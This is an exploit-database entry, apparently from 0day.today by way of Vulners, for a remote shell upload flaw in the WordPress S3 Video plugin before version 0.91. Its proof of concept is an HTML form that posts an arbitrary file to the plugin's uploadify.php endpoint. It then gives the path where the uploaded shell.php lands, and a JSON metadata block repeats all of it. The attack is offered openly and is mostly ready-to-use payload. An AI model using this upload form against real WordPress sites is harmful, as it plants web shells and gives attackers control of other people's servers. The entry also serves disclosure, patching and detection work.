Search...

WordPress S3 Video Remote Shell Upload Vulnerability

2015-12-11T00:00:00

ID 1337DAY-ID-24707
Type zdt
Reporter Manish Tanwar
Modified 2015-12-11T00:00:00

Description

WordPress S3 Video plugin suffers from a remote shell upload vulnerability. Versions prior to 0.91 are affected.

                                        
                                            ##################################################################################################
#Exploit Title : Wordpress S3 Video Plugin file upload 
#Author        : Manish Kishan Tanwar AKA error1046
#Vendor Link   : http://plugins.svn.wordpress.org/s3-video/tags/0.91/      
# Affected Version: below version 0.91
#Date          : 9/12/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
The S3 Video Plugin allows the embedding of video media stored on Amazon's S3 storage into a WordPress blog post or page.
 
////////////////
///  POC   ////
///////////////


http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php

&lt;form method=post action="http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data"&gt;
&lt;input type=file name=Filedata&gt; &lt;input type=submit name=submit&gt;

shell location:-
target.com/shell.php

#  0day.today [2018-04-09]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-24707", "lastseen": "2018-04-09T19:43:54", "viewCount": 7, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-04-09T19:43:54", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24707", "SECURITYVULNS:VULN:11131"]}], "modified": "2018-04-09T19:43:54", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/24707", "description": "WordPress S3 Video plugin suffers from a remote shell upload vulnerability. Versions prior to 0.91 are affected.", "title": "WordPress S3 Video Remote Shell Upload Vulnerability", "cvelist": [], "sourceData": "##################################################################################################\r\n#Exploit Title : Wordpress S3 Video Plugin file upload \r\n#Author : Manish Kishan Tanwar AKA error1046\r\n#Vendor Link : http://plugins.svn.wordpress.org/s3-video/tags/0.91/ \r\n# Affected Version: below version 0.91\r\n#Date : 9/12/2015\r\n#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi\r\n#Discovered At : Indishell Lab\r\n##################################################################################################\r\n\r\n////////////////////////\r\n/// Overview:\r\n////////////////////////\r\nThe S3 Video Plugin allows the embedding of video media stored on Amazon's S3 storage into a WordPress blog post or page.\r\n \r\n////////////////\r\n/// POC ////\r\n///////////////\r\n\r\n\r\nhttp://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php\r\n\r\n<form method=post action=\"http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php\" enctype=\"multipart/form-data\">\r\n<input type=file name=Filedata> <input type=submit name=submit>\r\n\r\nshell location:-\r\ntarget.com/shell.php\n\n# 0day.today [2018-04-09] #", "published": "2015-12-11T00:00:00", "references": [], "reporter": "Manish Tanwar", "modified": "2015-12-11T00:00:00", "href": "https://0day.today/exploit/description/24707", "immutableFields": []}